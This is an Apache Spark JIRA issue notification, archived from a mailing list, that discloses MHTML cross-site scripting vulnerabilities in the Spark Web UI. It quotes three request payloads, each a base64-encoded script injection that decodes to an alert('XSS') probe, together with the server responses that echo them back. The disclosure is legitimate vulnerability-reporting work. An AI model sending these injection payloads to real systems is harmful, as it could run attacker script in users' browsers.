spark-issues mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Sean Owen (JIRA)" <j...@apache.org>
Subject [jira] [Updated] (SPARK-20393) Strengthen Spark to prevent XSS vulnerabilities
Date Fri, 26 May 2017 18:13:04 GMT

     [ https://issues.apache.org/jira/browse/SPARK-20393?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]

Sean Owen updated SPARK-20393:
------------------------------
    Fix Version/s:     (was: 2.3.0)
                   2.2.0

> Strengthen Spark to prevent XSS vulnerabilities
> -----------------------------------------------
>
>                 Key: SPARK-20393
>                 URL: https://issues.apache.org/jira/browse/SPARK-20393
>             Project: Spark
>          Issue Type: Bug
>          Components: Web UI
>    Affects Versions: 1.5.2, 2.0.2, 2.1.0
>            Reporter: Nicholas Marion
>            Assignee: Nicholas Marion
>            Priority: Minor
>              Labels: security
>             Fix For: 2.2.0
>
>
> Using IBM Security AppScan Standard, we discovered several easy to recreate MHTML cross
site scripting vulnerabilities in the Apache Spark Web GUI application and these vulnerabilities
were found to exist in Spark version 1.5.2 and 2.0.2, the two levels we initially tested.
Cross-site scripting attack is not really an attack on the Spark server as much as an attack
on the end user, taking advantage of their trust in the Spark server to get them to click
on a URL like the ones in the examples below.  So whether the user could or could not change
lots of stuff on the Spark server is not the key point.  It is an attack on the user themselves.
 If they click the link the script could run in their browser and comprise their device. 
Once the browser is compromised it could submit Spark requests but it also might not.
> https://blogs.technet.microsoft.com/srd/2011/01/28/more-information-about-the-mhtml-script-injection-vulnerability/
> {quote}
> Request: GET /app/?appId=Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a--
> _AppScan%0d%0aContent-Location:foo%0d%0aContent-Transfer-
> Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a
> HTTP/1.1
> Excerpt from response: <div class="row-fluid">No running application with ID Content-Type:
multipart/related;
> boundary=_AppScan
> --_AppScan
> Content-Location:foo
> Content-Transfer-Encoding:base64
> PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
> </div>
> Result: In the above payload the BASE64 data decodes as:
> <html><script>alert("XSS")</script></html>
> Request: GET /history/app-20161012202114-0038/stages/stage?id=1&attempt=0&task.sort=Content-
> Type:%20multipart/related;%20boundary=_AppScan%0d%0a--_AppScan%0d%0aContent-
> Location:foo%0d%0aContent-Transfer-
> Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a&tas
> k.pageSize=100 HTTP/1.1
> Excerpt from response: Content-Type: multipart/related;
> boundary=_AppScan
> --_AppScan
> Content-Location:foo
> Content-Transfer-Encoding:base64
> PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
> Result: In the above payload the BASE64 data decodes as:
> <html><script>alert("XSS")</script></html>
> Request: GET /log?appId=app-20170113131903-0000&executorId=0&logType=Content-
> Type:%20multipart/related;%20boundary=_AppScan%0d%0a--_AppScan%0d%0aContent-
> Location:foo%0d%0aContent-Transfer-
> Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a&byt
> eLength=0 HTTP/1.1
> Excerpt from response: ==== Bytes 0-0 of 0 of /u/nmarion/Spark_2.0.2.0/Spark-DK/work/app-20170113131903-0000/0/Content-
> Type: multipart/related; boundary=_AppScan
> --_AppScan
> Content-Location:foo
> Content-Transfer-Encoding:base64
> PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
> Result: In the above payload the BASE64 data decodes as:
> <html><script>alert("XSS")</script></html>
> {quote}
> security@apache was notified and recommended a PR.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)

---------------------------------------------------------------------
To unsubscribe, e-mail: issues-unsubscribe@spark.apache.org
For additional commands, e-mail: issues-help@spark.apache.org


Mime
View raw message